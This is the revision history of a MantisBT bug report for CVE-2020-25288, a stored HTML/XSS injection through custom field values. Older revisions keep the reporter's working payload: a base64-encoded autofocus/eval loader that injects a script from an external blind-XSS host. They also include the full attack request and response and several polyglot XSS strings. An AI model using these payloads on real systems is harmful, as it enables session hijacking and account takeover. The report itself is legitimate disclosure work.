View Revisions: Issue #27275

Summary 0027275: CVE-2020-25288: HTML Injection on bug_update_page.php
Revision 2020-09-12 06:05 by dregad
Steps To Reproduce
  1. Login using your admin account
  2. Create a new custom field with the following payload in Regular Expression: "><script>alert(1);</script><h1>PWNED!</h1>
  3. Link this custom field to your project
  4. Go to any issue in that project
  5. Click the Edit button; if CSP settings allow it the script executes
  6. Scroll down to that custom field and notice the HTML injection

EDIT (dregad):

  • Original payload removed as it would download and execute a remote script from XSS Hunter (-> https://myblindxss.xss.ht/)
  • Steps updated with a harmless payload
Revision 2020-09-11 10:48 by dregad
Steps To Reproduce
  1. Login using your admin account
  2. Create a new custom field with payload of REMOVED
    ``
    or in my request :

REMOVED

Response :

REMOVED

  1. Link this custom field to your project
  2. Go to any issues with that custom field
  3. Click the Edit button and it should redirect to http://<host>/bug_update_page.php
  4. Find that custom field and you can see another input type

PoC included below

EDIT (dregad): Original payload removed as it would download and execute a remote script from XSS Hunter (-> https://myblindxss.xss.ht/)

Revision 2020-09-11 08:59 by dregad
Steps To Reproduce
  1. Login using your admin account

  2. Create a new custom field with payload of "><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbXlibGluZHhzcy54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus>
    or in my request :

POST /mantisbt2/manage_custom_field_update.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 944
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt2/manage_custom_field_edit_page.php?field_id=5
Cookie: MANTIS_collapse_settings=|sidebar:0; MANTIS_VIEW_ALL_COOKIE=1; MANTIS_MANAGE_CONFIG_COOKIE=0%3A1%3Abug_submit_status; PHPSESSID=qmp7sgl2ctblbbah0201tefk15; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=7a01c128bae97499b78c1a52329936977c062961f7d9b57cd3d18980fdccc896
Upgrade-Insecure-Requests: 1

manage_custom_field_update_token=20200911CNqfQEOcTmucg3W5ZuIOyCRkIkwQR-eg&field_id=5&return=manage_custom_field_page.php&name=%3Ch1+style%3D%22color%3Ared%3B%22%3ETEST%3C%2Fh1%3E&type=0&possible_values=%22%3E%3Cinput+onfocus%3Deval%28atob%28this.id%29%29+id%3DdmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbXlibGluZHhzcy54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7+autofocus%3E&default_value=%22%3E%3Cinput+onfocus%3Deval%28atob%28this.id%29%29+id%3DdmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbXlibGluZHhzcy54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7+autofocus%3E&valid_regexp=%22%3E%3Cinput+onfocus%3Deval%28atob%28this.id%29%29+id%3DdmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbXlibGluZHhzcy54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7+autofocus%3E&access_level_r=10&access_level_rw=10&length_min=0&length_max=0&filter_by=1&display_update=1

Response :

HTTP/1.1 200 OK
Date: Fri, 11 Sep 2020 00:09:22 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Fri, 11 Sep 2020 00:09:22 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Fri, 11 Sep 2020 00:09:22 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Vary: Accept-Encoding
Content-Length: 11186
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
    <title>MantisBT</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/default.css" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/status_config.php?cache_key=f4856b33b84f247924ce5769a9d0b2d2" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/dropzone-5.5.0.min.css" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/bootstrap-3.4.1.min.css" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/font-awesome-4.6.3.min.css" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/fonts.css" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/bootstrap-datetimepicker-4.17.47.min.css" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/ace.min.css" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/ace-mantis.css" />
    <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt2/css/ace-skins.min.css" />

    <link rel="shortcut icon" href="/mantisbt2/images/favicon.ico" type="image/x-icon" />
    <link rel="search" type="application/opensearchdescription+xml" title="MantisBT: full-text search" href="http://localhost/mantisbt2/browser_search_plugin.php?type=text"/>
    <link rel="search" type="application/opensearchdescription+xml" title="MantisBT: search by Issue Id" href="http://localhost/mantisbt2/browser_search_plugin.php?type=id"/>
    <script type="text/javascript" src="/mantisbt2/javascript_config.php?cache_key=f4856b33b84f247924ce5769a9d0b2d2"></script>
    <script type="text/javascript" src="/mantisbt2/javascript_translations.php?cache_key=3be95d1715b5c55a9480208daf800add"></script>
    <script type="text/javascript" src="/mantisbt2/js/jquery-2.2.4.min.js"></script>
    <script type="text/javascript" src="/mantisbt2/js/dropzone-5.5.0.min.js"></script>
    <script type="text/javascript" src="/mantisbt2/js/common.js"></script>
    <meta http-equiv="Refresh" content="1; URL=http://localhost/mantisbt2/manage_custom_field_page.php" />
</head>
<body class="skin-3">
<style>
* { font-family: "Open Sans"; } 
h1, h2, h3, h4, h5 { font-family: "Open Sans"; } 
</style>
&lt;div id=&quot;navbar&quot; class=&quot;navbar navbar-default navbar-collapse navbar-fixed-top noprint&quot;>&lt;div id=&quot;navbar-container&quot; class=&quot;navbar-container&quot;>&lt;button id=&quot;menu-toggler&quot; type=&quot;button&quot; class=&quot;navbar-toggle menu-toggler pull-left hidden-lg hidden-md&quot; data-target=&quot;#sidebar&quot;>&lt;span class=&quot;sr-only&quot;>Toggle sidebar&lt;/span>&lt;span class=&quot;icon-bar&quot;>&lt;/span>&lt;span class=&quot;icon-bar&quot;>&lt;/span>&lt;span class=&quot;icon-bar&quot;>&lt;/span>&lt;/button>&lt;div class=&quot;navbar-header&quot;>&lt;a href=&quot;/mantisbt2/my_view_page.php&quot; class=&quot;navbar-brand&quot;>&lt;span class=&quot;smaller-75&quot;> MantisBT &lt;/span>&lt;/a>&lt;button type=&quot;button&quot; class=&quot;navbar-toggle navbar-toggle collapsed pull-right hidden-sm hidden-md hidden-lg&quot; data-toggle=&quot;collapse&quot; data-target=&quot;.navbar-buttons,.navbar-menu&quot;>&lt;span class=&quot;sr-only&quot;>Toggle user menu&lt;/span>&lt;i class=&quot;ace-icon fa fa-user fa-2x white&quot;></i> &lt;/button>&lt;/div>&lt;div class=&quot;navbar-buttons navbar-header navbar-collapse collapse&quot;>&lt;ul class=&quot;nav ace-nav&quot;>&lt;li class=&quot;hidden-sm hidden-xs&quot;>&lt;div class=&quot;btn-group btn-corner padding-right-8 padding-left-8&quot;>&lt;a class=&quot;btn btn-primary btn-sm&quot; href=&quot;bug_report_page.php&quot;>&lt;i class=&quot;fa fa-edit&quot;></i> Report Issue&lt;/a>&lt;a class=&quot;btn btn-primary btn-sm&quot; href=&quot;manage_user_create_page.php&quot;>&lt;i class=&quot;fa fa-user-plus&quot;></i> Invite Users&lt;/a>&lt;/div></li>&lt;li class=&quot;grey&quot; id=&quot;dropdown_projects_menu&quot;>
&lt;a data-toggle=&quot;dropdown&quot; href=&quot;#&quot; class=&quot;dropdown-toggle&quot;>
 &quot;> javascript:eval('var a=document.createElement(\'script\');a.src=\'https://mybl 
 &lt;i class=&quot;ace-icon fa fa-angle-down bigger-110&quot;></i>
&lt;/a>
&lt;ul id=&quot;projects-list&quot; class=&quot; dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close&quot;>
<li>&lt;div class=&quot;projects-searchbox&quot;>&lt;input class=&quot;search form-control input-md&quot; placeholder=&quot;Search&quot; />&lt;/div></li>&lt;li class=&quot;divider&quot;></li>
<li>&lt;div class=&quot;scrollable-menu&quot;>&lt;ul class=&quot;list dropdown-yellow no-margin&quot;><li>/mantisbt2/set_project.php?project_id=0</li>
&lt;li class=&quot;divider&quot;></li>
<li>/mantisbt2/set_project.php?project_id=4</li>
<li>/mantisbt2/set_project.php?project_id=2</li>
<li>/mantisbt2/set_project.php?project_id=3</li>
&lt;li class=&quot;active&quot;>/mantisbt2/set_project.php?project_id=3;1</li>
</ul>&lt;/div></li></ul>
</li>
&lt;li class=&quot;grey&quot;>&lt;a data-toggle=&quot;dropdown&quot; href=&quot;#&quot; class=&quot;dropdown-toggle&quot;>&lt;i class=&quot;ace-icon fa fa-user fa-2x white&quot;></i> &lt;span class=&quot;user-info&quot;>administrator&lt;/span>&lt;i class=&quot;ace-icon fa fa-angle-down&quot;></i>&lt;/a>&lt;ul class=&quot;user-menu dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close&quot;><li>&lt;a href=&quot;/mantisbt2/account_page.php&quot;>&lt;i class=&quot;ace-icon fa fa-user&quot;> </i> My Account&lt;/a></li><li>&lt;a href=&quot;http://localhost/mantisbt2/issues_rss.php?username=administrator&key=nNUB0bUOFU1-De7V6n8RKAdmhJ6pi6Aa90nbcI9AxxsZbE1s_lH6wQuBjczaLZGNrGwqwTcaFunQLMtD04uK&project_id=1&quot;>&lt;i class=&quot;ace-icon fa fa-rss-square orange&quot;> </i> RSS&lt;/a></li>&lt;li class=&quot;divider&quot;></li><li>&lt;a href=&quot;/mantisbt2/logout_page.php&quot;>&lt;i class=&quot;ace-icon fa fa-sign-out&quot;> </i> Logout&lt;/a></li></ul></li></ul>&lt;/div>&lt;/div>&lt;/div>&lt;div class=&quot;main-container&quot; id=&quot;main-container&quot;>
&lt;div id=&quot;sidebar&quot; class=&quot;sidebar sidebar-fixed responsive compact &quot;>&lt;ul class=&quot;nav nav-list&quot;><li>
&lt;a href=&quot;/mantisbt2/my_view_page.php&quot;>
&lt;i class=&quot;menu-icon fa fa-dashboard&quot;></i> 
&lt;span class=&quot;menu-text&quot;> My View &lt;/span>
&lt;/a>
&lt;b class=&quot;arrow&quot;></b>
</li>
<li>
&lt;a href=&quot;/mantisbt2/view_all_bug_page.php&quot;>
&lt;i class=&quot;menu-icon fa fa-list-alt&quot;></i> 
&lt;span class=&quot;menu-text&quot;> View Issues &lt;/span>
&lt;/a>
&lt;b class=&quot;arrow&quot;></b>
</li>
<li>
&lt;a href=&quot;/mantisbt2/bug_report_page.php&quot;>
&lt;i class=&quot;menu-icon fa fa-edit&quot;></i> 
&lt;span class=&quot;menu-text&quot;> Report Issue &lt;/span>
&lt;/a>
&lt;b class=&quot;arrow&quot;></b>
</li>
<li>
&lt;a href=&quot;/mantisbt2/changelog_page.php&quot;>
&lt;i class=&quot;menu-icon fa fa-retweet&quot;></i> 
&lt;span class=&quot;menu-text&quot;> Change Log &lt;/span>
&lt;/a>
&lt;b class=&quot;arrow&quot;></b>
</li>
<li>
&lt;a href=&quot;/mantisbt2/roadmap_page.php&quot;>
&lt;i class=&quot;menu-icon fa fa-road&quot;></i> 
&lt;span class=&quot;menu-text&quot;> Roadmap &lt;/span>
&lt;/a>
&lt;b class=&quot;arrow&quot;></b>
</li>
<li>
&lt;a href=&quot;/mantisbt2/summary_page.php&quot;>
&lt;i class=&quot;menu-icon fa fa-bar-chart-o&quot;></i> 
&lt;span class=&quot;menu-text&quot;> Summary &lt;/span>
&lt;/a>
&lt;b class=&quot;arrow&quot;></b>
</li>
&lt;li class=&quot;active&quot;>
&lt;a href=&quot;/mantisbt2/manage_overview_page.php&quot;>
&lt;i class=&quot;menu-icon fa fa-gears&quot;></i> 
&lt;span class=&quot;menu-text&quot;> Manage &lt;/span>
&lt;/a>
&lt;b class=&quot;arrow&quot;></b>
</li>
</ul>&lt;div id=&quot;sidebar-btn&quot; class=&quot;sidebar-toggle sidebar-collapse&quot;>&lt;i data-icon2=&quot;ace-icon fa fa-angle-double-right&quot; data-icon1=&quot;ace-icon fa fa-angle-double-left&quot;
        class=&quot;ace-icon fa fa-angle-double-left&quot;></i>&lt;/div>&lt;/div>&lt;div class=&quot;main-content&quot;>
&lt;div id=&quot;breadcrumbs&quot; class=&quot;breadcrumbs noprint&quot;>
&lt;ul class=&quot;breadcrumb&quot;>
  <li>&lt;i class=&quot;fa fa-user home-icon active&quot;></i>  /mantisbt2/account_page.php
  &lt;span class=&quot;label hidden-xs label-default arrowed&quot;>administrator&lt;/span></li>
</ul>
&lt;div class=&quot;nav-recent hidden-xs&quot;>Recently Visited: &lt;a href=&quot;/mantisbt2/view.php?id=11&quot; title=&quot;[assigned] &quot;>&lt;img src onerror=alert(1)> &quot;autofocus onfocus=alert(1)// &lt;/script>&lt;script>alert(1)&lt;/script> '-alert(1)-' \'-alert(1)// javascr&quot;>0000011&lt;/a>, &lt;a href=&quot;/mantisbt2/view.php?id=4&quot; title=&quot;[assigned] &quot;>&lt;script src=https://myblindxss.xss.ht>&lt;/script> javascript:eval('var a=document.createElement(\'script\');a.src=\'https://mybl&quot;>0000004&lt;/a>, &lt;a href=&quot;/mantisbt2/view.php?id=10&quot; title=&quot;[assigned] &quot;>&lt;img src onerror=alert(1)> &quot;autofocus onfocus=alert(1)// &lt;/script>&lt;script>alert(1)&lt;/script> '-alert(1)-' \'-alert(1)// javascr&quot;>0000010&lt;/a>, &lt;a href=&quot;/mantisbt2/view.php?id=9&quot; title=&quot;[resolved] &quot;>&lt;script src=https://myblindxss.xss.ht>&lt;/script> javascript:eval('var a=document.createElement(\'script\');a.src=\'https://mybl&quot; class=&quot;resolved&quot;>0000009&lt;/a>, &lt;a href=&quot;/mantisbt2/view.php?id=8&quot; title=&quot;[assigned] &quot;>&lt;script src=https://myblindxss.xss.ht>&lt;/script> javascript:eval('var a=document.createElement(\'script\');a.src=\'https://mybl&quot;>0000008&lt;/a>&lt;/div>&lt;div id=&quot;nav-search&quot; class=&quot;nav-search&quot;>&lt;form class=&quot;form-search&quot; method=&quot;post&quot; action=&quot;/mantisbt2/jump_to_bug.php&quot;>&lt;span class=&quot;input-icon&quot;>&lt;input type=&quot;text&quot; name=&quot;bug_id&quot; autocomplete=&quot;off&quot; class=&quot;nav-search-input&quot; placeholder=&quot;Issue #&quot;>&lt;i class=&quot;ace-icon fa fa-search nav-search-icon&quot;></i>&lt;/span>&lt;/form>&lt;/div>
&lt;/div>
  &lt;div class=&quot;page-content&quot;>
&lt;div class=&quot;row&quot;>
&lt;div class=&quot;container-fluid&quot;>&lt;div class=&quot;col-md-12 col-xs-12&quot;>&lt;div class=&quot;space-0&quot;>&lt;/div>&lt;div class=&quot;alert alert-success center&quot;>&lt;p class=&quot;bold bigger-110&quot;>Operation successful.</p><br />&lt;div class=&quot;btn-group&quot;>manage_custom_field_page.php&lt;/div>&lt;/div>&lt;/div>&lt;/div>
&lt;/div>
&lt;/div>
&lt;/div>
&lt;div class=&quot;clearfix&quot;>&lt;/div>
&lt;div class=&quot;space-20&quot;>&lt;/div>
&lt;div class=&quot;footer noprint&quot;>
&lt;div class=&quot;footer-inner&quot;>
&lt;div class=&quot;footer-content&quot;>
&lt;div class=&quot;col-md-6 col-xs-12 no-padding&quot;>
&lt;address>
<strong>Powered by https://www.mantisbt.org</strong> <br>
&lt;small>Copyright © 2000 - 2020 MantisBT Team&lt;/small><br>&lt;small>Contact webmaster@example.com for assistance&lt;/small><br>
&lt;/address>
&lt;/div>
&lt;div class=&quot;col-md-6 col-xs-12&quot;>
&lt;div class=&quot;pull-right&quot; id=&quot;powered-by-mantisbt-logo&quot;>
&lt;a href=&quot;https://www.mantisbt.org&quot; title=&quot;Mantis Bug Tracker: a free and open source web based bug tracking system.&quot;>&lt;img src=&quot;/mantisbt2/images/mantis_logo.png&quot; width=&quot;102&quot; height=&quot;35&quot; alt=&quot;Powered by Mantis Bug Tracker: a free and open source web based bug tracking system.&quot; />&lt;/a>
&lt;/div>
&lt;/div>
&lt;/div>
&lt;/div>
&lt;/div>
&lt;a class=&quot;btn-scroll-up btn btn-sm btn-inverse display&quot; id=&quot;btn-scroll-up&quot; href=&quot;#&quot;>
&lt;i class=&quot;ace-icon fa fa-angle-double-up icon-only bigger-110&quot;></i>
&lt;/a>
&lt;/div>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/bootstrap-3.4.1.min.js&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/moment-with-locales-2.24.0.min.js&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/bootstrap-datetimepicker-4.17.47.min.js&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/typeahead.jquery-1.3.0.min.js&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/list-1.5.0.min.js&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/ace.min.js&quot;>&lt;/script>
&lt;/body>
&lt;/html>
  1. Link this custom field to your project

  2. Go to any issues with that custom field

  3. Click the Edit button and it should redirect to http://&lt;host>/bug_update_page.php

  4. Find that custom field and you can see another input type

PoC included below

Revision 2020-09-10 20:12 by d3vpoo1
Steps To Reproduce
  1. Login using your admin account

  2. Create a new custom field with payload of &quot;>&lt;input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbXlibGluZHhzcy54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus>
    or in my request :

POST /mantisbt2/manage_custom_field_update.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 944
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt2/manage_custom_field_edit_page.php?field_id=5
Cookie: MANTIS_collapse_settings=|sidebar:0; MANTIS_VIEW_ALL_COOKIE=1; MANTIS_MANAGE_CONFIG_COOKIE=0%3A1%3Abug_submit_status; PHPSESSID=qmp7sgl2ctblbbah0201tefk15; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=7a01c128bae97499b78c1a52329936977c062961f7d9b57cd3d18980fdccc896
Upgrade-Insecure-Requests: 1

manage_custom_field_update_token=20200911CNqfQEOcTmucg3W5ZuIOyCRkIkwQR-eg&field_id=5&return=manage_custom_field_page.php&name=%3Ch1+style%3D%22color%3Ared%3B%22%3ETEST%3C%2Fh1%3E&type=0&possible_values=%22%3E%3Cinput+onfocus%3Deval%28atob%28this.id%29%29+id%3DdmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbXlibGluZHhzcy54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7+autofocus%3E&default_value=%22%3E%3Cinput+onfocus%3Deval%28atob%28this.id%29%29+id%3DdmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbXlibGluZHhzcy54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7+autofocus%3E&valid_regexp=%22%3E%3Cinput+onfocus%3Deval%28atob%28this.id%29%29+id%3DdmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbXlibGluZHhzcy54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7+autofocus%3E&access_level_r=10&access_level_rw=10&length_min=0&length_max=0&filter_by=1&display_update=1

Response :

HTTP/1.1 200 OK
Date: Fri, 11 Sep 2020 00:09:22 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Fri, 11 Sep 2020 00:09:22 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Fri, 11 Sep 2020 00:09:22 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Vary: Accept-Encoding
Content-Length: 11186
Connection: close
Content-Type: text/html; charset=UTF-8

&lt;!DOCTYPE html>
&lt;html>
&lt;head>
    &lt;meta http-equiv=&quot;Content-type&quot; content=&quot;text/html; charset=utf-8&quot; />
    &lt;title>MantisBT&lt;/title>
&lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/default.css&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/status_config.php?cache_key=f4856b33b84f247924ce5769a9d0b2d2&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/dropzone-5.5.0.min.css&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/bootstrap-3.4.1.min.css&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/font-awesome-4.6.3.min.css&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/fonts.css&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/bootstrap-datetimepicker-4.17.47.min.css&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/ace.min.css&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/ace-mantis.css&quot; />
    &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;http://localhost/mantisbt2/css/ace-skins.min.css&quot; />

    &lt;link rel=&quot;shortcut icon&quot; href=&quot;/mantisbt2/images/favicon.ico&quot; type=&quot;image/x-icon&quot; />
    &lt;link rel=&quot;search&quot; type=&quot;application/opensearchdescription+xml&quot; title=&quot;MantisBT: full-text search&quot; href=&quot;http://localhost/mantisbt2/browser_search_plugin.php?type=text&quot;/>
    &lt;link rel=&quot;search&quot; type=&quot;application/opensearchdescription+xml&quot; title=&quot;MantisBT: search by Issue Id&quot; href=&quot;http://localhost/mantisbt2/browser_search_plugin.php?type=id&quot;/>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/javascript_config.php?cache_key=f4856b33b84f247924ce5769a9d0b2d2&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/javascript_translations.php?cache_key=3be95d1715b5c55a9480208daf800add&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/jquery-2.2.4.min.js&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/dropzone-5.5.0.min.js&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/common.js&quot;>&lt;/script>
    &lt;meta http-equiv=&quot;Refresh&quot; content=&quot;1; URL=http://localhost/mantisbt2/manage_custom_field_page.php&quot; />
&lt;/head>
&lt;body class=&quot;skin-3&quot;>
&lt;style>
* { font-family: &quot;Open Sans&quot;; } 
h1, h2, h3, h4, h5 { font-family: &quot;Open Sans&quot;; } 
&lt;/style>
&lt;div id=&quot;navbar&quot; class=&quot;navbar navbar-default navbar-collapse navbar-fixed-top noprint&quot;>&lt;div id=&quot;navbar-container&quot; class=&quot;navbar-container&quot;>&lt;button id=&quot;menu-toggler&quot; type=&quot;button&quot; class=&quot;navbar-toggle menu-toggler pull-left hidden-lg hidden-md&quot; data-target=&quot;#sidebar&quot;>&lt;span class=&quot;sr-only&quot;>Toggle sidebar&lt;/span>&lt;span class=&quot;icon-bar&quot;>&lt;/span>&lt;span class=&quot;icon-bar&quot;>&lt;/span>&lt;span class=&quot;icon-bar&quot;>&lt;/span>&lt;/button>&lt;div class=&quot;navbar-header&quot;>&lt;a href=&quot;/mantisbt2/my_view_page.php&quot; class=&quot;navbar-brand&quot;>&lt;span class=&quot;smaller-75&quot;> MantisBT &lt;/span>&lt;/a>&lt;button type=&quot;button&quot; class=&quot;navbar-toggle navbar-toggle collapsed pull-right hidden-sm hidden-md hidden-lg&quot; data-toggle=&quot;collapse&quot; data-target=&quot;.navbar-buttons,.navbar-menu&quot;>&lt;span class=&quot;sr-only&quot;>Toggle user menu&lt;/span>&lt;i class=&quot;ace-icon fa fa-user fa-2x white&quot;></i> &lt;/button>&lt;/div>&lt;div class=&quot;navbar-buttons navbar-header navbar-collapse collapse&quot;>&lt;ul class=&quot;nav ace-nav&quot;>&lt;li class=&quot;hidden-sm hidden-xs&quot;>&lt;div class=&quot;btn-group btn-corner padding-right-8 padding-left-8&quot;>&lt;a class=&quot;btn btn-primary btn-sm&quot; href=&quot;bug_report_page.php&quot;>&lt;i class=&quot;fa fa-edit&quot;></i> Report Issue&lt;/a>&lt;a class=&quot;btn btn-primary btn-sm&quot; href=&quot;manage_user_create_page.php&quot;>&lt;i class=&quot;fa fa-user-plus&quot;></i> Invite Users&lt;/a>&lt;/div></li>&lt;li class=&quot;grey&quot; id=&quot;dropdown_projects_menu&quot;>
&lt;a data-toggle=&quot;dropdown&quot; href=&quot;#&quot; class=&quot;dropdown-toggle&quot;>
&0000160;&quot;> javascript:eval('var a=document.createElement(\'script\');a.src=\'https://mybl&0000160;
 &lt;i class=&quot;ace-icon fa fa-angle-down bigger-110&quot;></i>
&lt;/a>
&lt;ul id=&quot;projects-list&quot; class=&quot; dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close&quot;>
<li>&lt;div class=&quot;projects-searchbox&quot;>&lt;input class=&quot;search form-control input-md&quot; placeholder=&quot;Search&quot; />&lt;/div></li>&lt;li class=&quot;divider&quot;></li>
<li>&lt;div class=&quot;scrollable-menu&quot;>&lt;ul class=&quot;list dropdown-yellow no-margin&quot;><li>/mantisbt2/set_project.php?project_id=0</li>
&lt;li class=&quot;divider&quot;></li>
<li>/mantisbt2/set_project.php?project_id=4</li>
<li>/mantisbt2/set_project.php?project_id=2</li>
<li>/mantisbt2/set_project.php?project_id=3</li>
&lt;li class=&quot;active&quot;>/mantisbt2/set_project.php?project_id=3;1</li>
</ul>&lt;/div></li></ul>
</li>
&lt;li class=&quot;grey&quot;>&lt;a data-toggle=&quot;dropdown&quot; href=&quot;#&quot; class=&quot;dropdown-toggle&quot;>&lt;i class=&quot;ace-icon fa fa-user fa-2x white&quot;></i> &lt;span class=&quot;user-info&quot;>administrator&lt;/span>&lt;i class=&quot;ace-icon fa fa-angle-down&quot;></i>&lt;/a>&lt;ul class=&quot;user-menu dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close&quot;><li>&lt;a href=&quot;/mantisbt2/account_page.php&quot;>&lt;i class=&quot;ace-icon fa fa-user&quot;> </i> My Account&lt;/a></li><li>&lt;a href=&quot;http://localhost/mantisbt2/issues_rss.php?username=administrator&key=nNUB0bUOFU1-De7V6n8RKAdmhJ6pi6Aa90nbcI9AxxsZbE1s_lH6wQuBjczaLZGNrGwqwTcaFunQLMtD04uK&project_id=1&quot;>&lt;i class=&quot;ace-icon fa fa-rss-square orange&quot;> </i> RSS&lt;/a></li>&lt;li class=&quot;divider&quot;></li><li>&lt;a href=&quot;/mantisbt2/logout_page.php&quot;>&lt;i class=&quot;ace-icon fa fa-sign-out&quot;> </i> 